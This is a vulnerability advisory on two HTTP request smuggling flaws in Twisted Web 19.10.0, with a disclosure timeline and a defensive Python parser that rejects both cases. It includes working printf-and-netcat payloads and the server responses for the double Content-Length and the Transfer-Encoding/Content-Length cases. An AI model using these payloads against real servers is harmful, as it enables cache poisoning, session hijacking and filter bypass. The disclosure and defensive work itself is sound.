ADVISORY SUMMARY

The following document describes the vulnerabilities identified in Twisted version 19.10.0.

Impact

Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses. By exploiting inconsistencies in HTTP message parsing, attackers can smuggle complete or partial secondary HTTP messages to a remote server to attack backend services or other users.

In this case, the risk is highly contextual: it depends on where and why Twisted is deployed in a given environment. The impact will vary with the business purpose of the service built on Twisted.

For more information on the impact of HTTP request splitting vulnerabilities, please refer to the following:

Risk Level

High

Affected Vendor

Product Vendor        Product Name   Affected Version
Twisted Matrix Labs   Twisted        19.10.0

Product Description

Twisted is an event-driven networking engine written in Python. The project’s official website is https://twistedmatrix.com/. The latest version of the application is 20.3.0rc1, released on March 9, 2020.

Vulnerabilities List:

One vulnerability was identified within the Twisted application:

Solution

Update to version 20.3.0rc1.

Credits

Jake Miller, Security Associate, Bishop Fox - jmiller@bishopfox.com

Timeline

Initial Discovery: 12/05/2019
Contact with vendor: 12/09/2019
Vendor acknowledged vulnerabilities: 12/09/2019
Touch-base regarding disclosure; vendor optimistic of 3/9 patch deadline: 02/24/2020
Following up on patch status: 03/03/2020
Shared assigned CVE IDs with Twisted team: 03/04/2020
Coordinated full-disclosure/release timeline: 03/06/2020
Vendor released patched version 20.3.0rc1: 03/09/2020
Vulnerabilities publicly disclosed: 03/11/2020

This vulnerability is described in the following sections.

VULNERABILITY

HTTP REQUEST SPLITTING

Two HTTP request splitting (a.k.a. HTTP request smuggling) vulnerabilities were identified in Twisted Web 19.10.0, the latest release at the time of discovery. Both issues arose from deviations from RFC 7230 (HTTP/1.1: Message Syntax and Routing). Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses.

To demonstrate the vulnerabilities, printf and netcat command examples are provided to construct raw HTTP messages as the client. For the server, I started Twisted Web 19.10.0 using twistd web --path . --port tcp:<port> (Twisted Framework Python apps that use twistd.web are also affected).





CVE ID Security Risk Impact Access Vector CVE-2020-10108 High HTTP Request Splitting Remote, Other

Instance #1

Double Content-Length Headers

When presented with two Content-Length headers, Twisted Web ignored the first one. When the second Content-Length was set to zero, Twisted Web interpreted the request body as a pipelined request.

According to RFC 7230 Section 3.3.3, rule 4, if a message is received with multiple Content-Length headers with differing values, the server must reject the message with a 400 (Bad Request) response.
Request

printf 'GET /doesnotexist HTTP/1.1\r\n'\
'Content-Length: 56\r\n'\
'Content-Length: 0\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'GET /?opfdii=k58inf HTTP/1.1\r\n'\
'Host: test.example.com\r\n'\
'\r\n' | nc 127.0.0.1 <port>

Response

HTTP/1.1 404 Not Found
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 145

<html>
<head><title>404 - No Such Resource</title></head>
<body>
<h1>No Such Resource</h1>
<p>File not found.</p>
</body>
</html>

HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT

Hello

As shown above, both the /doesnotexist request and the smuggled request to the root path (/) were resolved successfully.





CVE ID Security Risk Impact Access Vector CVE-2020-10109 High HTTP Request Splitting Remote, Other

Instance #2

Differing Content-Length/Chunked Encoding

When presented with both a Content-Length header and a chunked Transfer-Encoding header, the Content-Length took precedence, and the remainder of the request body was interpreted by Twisted Web as a pipelined request.

According to RFC 7230 Section 3.3.3, rule 3, if a message with both Content-Length and chunked Transfer-Encoding is accepted, the Transfer-Encoding overrides the Content-Length.
Request

printf 'GET /?nkomd7=8h7pjm HTTP/1.1\r\n'\
'Transfer-Encoding: chunked\r\n'\
'Content-Length: 4\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'33\r\n'\
'GET /?ab8c4i=deg3if HTTP/1.1\r\n'\
'Content-Length: 5\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'\r\n'\
'0\r\n'\
'\r\n' | nc 127.0.0.1 <port>



Response

HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT

Hello

HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT

Hello



As shown above, the smuggled requests were interpreted by the Twisted server as separate requests and answered. The impact of these vulnerabilities can vary depending on the surrounding infrastructure and the purpose of the service implemented with Twisted.
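As an added illustration (not part of the advisory and not Twisted's own parser), the following Python implements the RFC 7230 Section 3.3.3 framing rules that Instance #1 and Instance #2 above violate, and runs them over the two request payloads shown above, reconstructed here as constructed byte strings. A parser that applies rule 4 (reject differing Content-Length values) and rule 3 (Transfer-Encoding together with Content-Length) answers each payload with 400 and never yields a second request, while constructed, well-formed pipelined and chunked traffic still parses. The function names, the sample requests and the choice to reject a Transfer-Encoding/Content-Length conflict outright are this example's own assumptions.

```python
"""Strict HTTP/1.1 request framing per RFC 7230 section 3.3.3 (added example)."""
import re


class FramingError(ValueError):
    """Framing is ambiguous or invalid: answer 400 and close the connection."""


def parse_head(raw):
    """Return (request_line, [(lowercased name, value), ...], bytes after the head)."""
    end = raw.find(b"\r\n\r\n")
    if end < 0:
        raise FramingError("incomplete header block")
    lines = raw[:end].split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise FramingError("malformed header line: %r" % line)
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, raw[end + 4:]


def body_framing(headers):
    """Decide how the body is delimited: ("chunked", None) or ("length", n)."""
    te = [v for n, v in headers if n == b"transfer-encoding"]
    cl = [p.strip() for n, v in headers if n == b"content-length" for p in v.split(b",")]
    if te:
        if cl:
            # Rule 3: Transfer-Encoding would override Content-Length, but a message
            # carrying both "ought to be handled as an error"; this example rejects it.
            raise FramingError("both Transfer-Encoding and Content-Length present")
        codings = [c.strip().lower() for v in te for c in v.split(b",")]
        if codings[-1] != b"chunked":
            raise FramingError("final transfer-coding is not chunked")
        return "chunked", None
    if not cl:
        return "length", 0  # rule 6: no body
    # Rule 4: differing (or non-numeric) Content-Length values are unrecoverable.
    if len(set(cl)) != 1 or not re.fullmatch(rb"[0-9]+", cl[0]):
        raise FramingError("conflicting or invalid Content-Length: %r" % (cl,))
    return "length", int(cl[0])


def read_chunked(data):
    """Decode a chunked body; return (decoded_body, bytes after the last-chunk)."""
    body, pos = bytearray(), 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            raise FramingError("truncated chunk-size line")
        size_field = data[pos:eol].split(b";", 1)[0].strip()  # drop chunk extensions
        if not re.fullmatch(rb"[0-9A-Fa-f]+", size_field):
            raise FramingError("invalid chunk size: %r" % size_field)
        size, pos = int(size_field, 16), eol + 2
        if size == 0:
            end = data.find(b"\r\n", pos)
            while end >= 0 and end != pos:  # skip trailer fields up to the empty line
                pos, end = end + 2, data.find(b"\r\n", end + 2)
            if end < 0:
                raise FramingError("truncated trailer section")
            return bytes(body), data[pos + 2:]
        if data[pos + size:pos + size + 2] != b"\r\n":
            raise FramingError("chunk data does not end where its size says")
        body += data[pos:pos + size]
        pos += size + 2


def split_requests(stream):
    """Split one connection's bytes into (request_line, headers, body) tuples."""
    requests = []
    while stream:
        request_line, headers, rest = parse_head(stream)
        kind, n = body_framing(headers)
        if kind == "chunked":
            body, stream = read_chunked(rest)
        elif len(rest) < n:
            raise FramingError("body shorter than Content-Length")
        else:
            body, stream = rest[:n], rest[n:]
        requests.append((request_line, headers, body))
    return requests


# Constructed samples: the advisory's two payloads, plus well-formed traffic.
DOUBLE_CL = (b"GET /doesnotexist HTTP/1.1\r\nContent-Length: 56\r\nContent-Length: 0\r\n"
             b"Host: test.example.com\r\n\r\n"
             b"GET /?opfdii=k58inf HTTP/1.1\r\nHost: test.example.com\r\n\r\n")
TE_AND_CL = (b"GET /?nkomd7=8h7pjm HTTP/1.1\r\nTransfer-Encoding: chunked\r\n"
             b"Content-Length: 4\r\nContent-Type: application/x-www-form-urlencoded\r\n"
             b"Host: test.example.com\r\n\r\n33\r\nGET /?ab8c4i=deg3if HTTP/1.1\r\n"
             b"Content-Length: 5\r\nHost: test.example.com\r\n\r\n\r\n0\r\n\r\n")
PIPELINED_OK = (b"POST /a HTTP/1.1\r\nHost: h\r\nContent-Length: 2\r\n\r\nhi"
                b"GET /b HTTP/1.1\r\nHost: h\r\n\r\n")
CHUNKED_OK = (b"POST /c HTTP/1.1\r\nHost: h\r\nTransfer-Encoding: chunked\r\n\r\n"
              b"5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n")


def classify(stream):
    """Return the request targets a strict server would see, or its 400 reason."""
    try:
        return [line.split(b" ")[1] for line, _, _ in split_requests(stream)]
    except FramingError as exc:
        return "400 Bad Request: %s" % exc


if __name__ == "__main__":
    for name in ("DOUBLE_CL", "TE_AND_CL", "PIPELINED_OK", "CHUNKED_OK"):
        print(name, "->", classify(globals()[name]))
```

Running the module prints one verdict per sample: the two advisory payloads are rejected at the header stage, so the trailing GET lines are never parsed as requests, whereas the pipelined pair yields two requests and the chunked sample yields one request whose decoded body is "hello world". Even if a server took the RFC's lenient path for Instance #2 and let the chunked coding win, the 0x33 (51-byte) chunk in that payload does not end on a CRLF, so a boundary-checking chunk decoder such as read_chunked would still answer 400 rather than treating the remainder as a new request.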